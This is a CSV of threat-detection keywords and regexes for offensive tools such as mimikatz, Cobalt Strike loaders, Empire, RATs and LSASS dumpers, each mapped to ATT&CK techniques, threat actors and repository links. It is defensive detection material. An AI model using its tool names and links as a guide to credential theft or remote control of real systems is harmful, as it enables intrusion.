"*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50660"
"*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","50661"
"*kuhl_m_sekurlsa_utils.h*",".{0,1000}kuhl_m_sekurlsa_utils\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","50662"
"*kuipersupport@onionmail.org*",".{0,1000}kuipersupport\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50663"
"*kwallet2john.py*",".{0,1000}kwallet2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50664"
"*kyleavery/AceLdr*",".{0,1000}kyleavery\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","N/A","10","10","925","164","2024-06-04T16:45:42Z","2022-08-11T00:06:09Z","50665"
"*kyleavery/inject-assembly*",".{0,1000}kyleavery\/inject\-assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","50666"
"*kyleavery/pendulum*",".{0,1000}kyleavery\/pendulum.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","#linux","N/A","9","1","95","11","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z","50667"
"*L e G e N d - O f - S i R - D o O o M - R a T - THE HELL*",".{0,1000}L\se\sG\se\sN\sd\s\-\sO\sf\s\-\sS\si\sR\s\-\sD\so\sO\so\sM\s\-\sR\sa\sT\s\-\sTHE\sHELL.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","50668"
"*L""NanoDumpPwd""*",".{0,1000}L\""NanoDumpPwd\"".{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","50669"
"*'l', 's', 'a', 's', 's', '.', 'e', 'x', 'e'*",".{0,1000}\'l\',\s\'s\',\s\'a\',\s\'s\',\s\'s\',\s\'\.\',\s\'e\',\s\'x\',\s\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","50670"
"*'l','s','a','s','s','.','e','x','e'*",".{0,1000}\'l\',\'s\',\'a\',\'s\',\'s\',\'\.\',\'e\',\'x\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","50671"
"*L04DUr118(h00k*",".{0,1000}L04DUr118\(h00k.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50673"
"*L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI=*",".{0,1000}L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI\=.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#base64","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","50674"
"*l0n3m4n/CVE-2024-22274-RCE*",".{0,1000}l0n3m4n\/CVE\-2024\-22274\-RCE.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","1","N/A","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","50675"
"*L0phtCrack*",".{0,1000}L0phtCrack.{0,1000}","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","50676"
"*l33th4x0r=cm91dGluZyBwYWNrZXQ=*",".{0,1000}l33th4x0r\=cm91dGluZyBwYWNrZXQ\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","50677"
"*l3m0n/WinPirate*",".{0,1000}l3m0n\/WinPirate.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","50678"
"*L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ=*",".{0,1000}L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50679"
"*L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ=*",".{0,1000}L3NhbSBvciAvc2lkIHRvIHRhcmdldCB0aGUgYWNjb3VudCBpcyBuZWVkZWQ\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","50680"
"*L3Vzci9iaW4vd2hvYW1p*",".{0,1000}L3Vzci9iaW4vd2hvYW1p.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","Black Basta","Collection","N/A","1","0","N/A","N/A","N/A","10","N/A","N/A","N/A","N/A","50681"
"*l55ysq5qjpin2vq23ul3gc3h62vp4wvenl7ov6fcn65vir7kc7gb5fyd.onion*",".{0,1000}l55ysq5qjpin2vq23ul3gc3h62vp4wvenl7ov6fcn65vir7kc7gb5fyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50682"
"*LABEL name=""Maitm""*",".{0,1000}LABEL\sname\=\""Maitm\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","50683"
"*label-implant *",".{0,1000}label\-implant\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","50684"
"*Ladon * AllScan*",".{0,1000}Ladon\s.{0,1000}\sAllScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50685"
"*Ladon * CiscoScan*",".{0,1000}Ladon\s.{0,1000}\sCiscoScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50686"
"*Ladon * OnlineIP*",".{0,1000}Ladon\s.{0,1000}\sOnlineIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50687"
"*Ladon * OnlinePC*",".{0,1000}Ladon\s.{0,1000}\sOnlinePC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","0","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50688"
"*Ladon * OsScan*",".{0,1000}Ladon\s.{0,1000}\sOsScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 